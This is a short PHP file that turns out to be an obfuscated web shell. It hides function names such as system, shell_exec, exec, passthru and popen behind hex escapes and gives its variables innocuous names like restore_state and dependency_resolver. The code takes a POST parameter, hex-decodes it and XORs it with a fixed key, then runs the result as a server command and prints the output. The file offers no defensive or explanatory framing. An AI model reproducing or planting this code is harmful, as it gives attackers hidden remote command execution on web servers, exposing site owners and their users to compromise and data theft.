<?php

$restore_state6 = "\x73t\x72ea\x6D_\x67et_\x63o\x6Et\x65n\x74\x73";
$restore_state3 = "\x65xe\x63";
$restore_state2 = "sh\x65\x6C\x6C\x5F\x65xec";
$restore_state5 = "p\x6F\x70en";
$restore_state7 = "p\x63\x6Co\x73e";
$restore_state1 = "s\x79\x73tem";
$restore_state4 = "p\x61\x73\x73t\x68ru";
$dependency_resolver = "he\x78\x32\x62i\x6E";
if (isset($_POST["\x64esc\x72ip\x74\x6Fr"])) {
            function app_initializer( $record ,  $rec ) { $elem= '' ;$y=0; while($y<strlen($record)){$elem.=chr(ord($record[$y])^$rec);$y++;} return $elem; }
            $descriptor = $dependency_resolver($_POST["\x64esc\x72ip\x74\x6Fr"]);
            $descriptor = app_initializer($descriptor, 20);
            if (function_exists($restore_state1)) {
                $restore_state1($descriptor);
            } elseif (function_exists($restore_state2)) {
                print $restore_state2($descriptor);
            } elseif (function_exists($restore_state3)) {
                $restore_state3($descriptor, $dchunk_record);
                print join("\n", $dchunk_record);
            } elseif (function_exists($restore_state4)) {
                $restore_state4($descriptor);
            } elseif (function_exists($restore_state5) && function_exists($restore_state6) && function_exists($restore_state7)) {
                $rec_elem = $restore_state5($descriptor, 'r');
                if ($rec_elem) {
                    $binding_data = $restore_state6($rec_elem);
                    $restore_state7($rec_elem);
                    print $binding_data;
                }
            }
            exit;
        }